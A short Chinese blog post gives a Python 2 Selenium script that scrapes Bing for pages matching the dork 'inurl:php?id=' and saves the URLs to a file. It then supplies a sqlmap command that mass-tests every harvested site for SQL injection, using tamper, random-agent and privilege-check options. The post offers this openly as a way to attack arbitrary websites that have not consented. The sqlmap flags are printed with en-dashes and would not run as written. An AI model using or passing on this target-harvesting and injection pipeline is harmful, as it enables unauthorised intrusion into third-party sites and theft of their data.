运用selenium爬取bing

正文:

不得说的是,原先一直在学scrapy框架知识,一直想用它解决,无奈,有些遇到的问题,目前的知识和积累暂时无法解决
只好暂时用单的爬虫爬取动态的bing页面,效率是真的慢。
写了个简易代码:(自行修改数字和页面)

#coding=utf-8
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
import time
from selenium import webdriver
import selenium.webdriver.support.ui as ui
from selenium.webdriver.common.keys import Keys
from selenium.common.exceptions import TimeoutException
#引入ActionChains鼠标操作类
from selenium.webdriver.common.action_chains import ActionChains
start_url="https://cn.bing.com/search?q=inurl%3aphp%3fid%3d&qs=HS&sc=8-0&cvid=2EEF822D8FE54B6CAAA1CE0169CA5BC5&sp=1&first=53&FORM=PERE3"
urls=range(800)
m=0
s=[1,2,3,4,5,6,7,8,9,10,11,12,13,14]
driver=webdriver.Chrome(executable_path="D:/selenium/chrome/chromedriver.exe")
wait=ui.WebDriverWait(driver,20)
driver.get(start_url)
for i in range(1,50):
	for j in s[0:]:
		try:
			urls[m]=wait.until(lambda x:x.find_element_by_xpath('//*[@id="b_results"]/li['+str(j)+']/h2/a').get_attribute("href"))
			print urls[m]
			m=m+1
		except Exception as e:
			e.message
	print i
	try:
		ActionChains(driver).click(wait.until(lambda x: x.find_element_by_css_selector("#b_results > li.b_pag > nav > ul > li:nth-child(7) > a"))).perform()
	except Exception as e:
		continue
print m
with open("urls.txt","a+") as f:
	for url in urls[0:]:
		f.write(str(url))
		f.write('\n')
f.close()
driver.quit()

 
然后,你懂的,
sqlmap -m urls.txt –batch –delay=1.3 –level=3 –tamper=space2comment –dbms=mysql –technique=EUS –random-agent –is-dba –time-sec=10 | tee result.txt
 
2018.8.12

发表评论

电子邮件地址不会被公开。 必填项已用*标注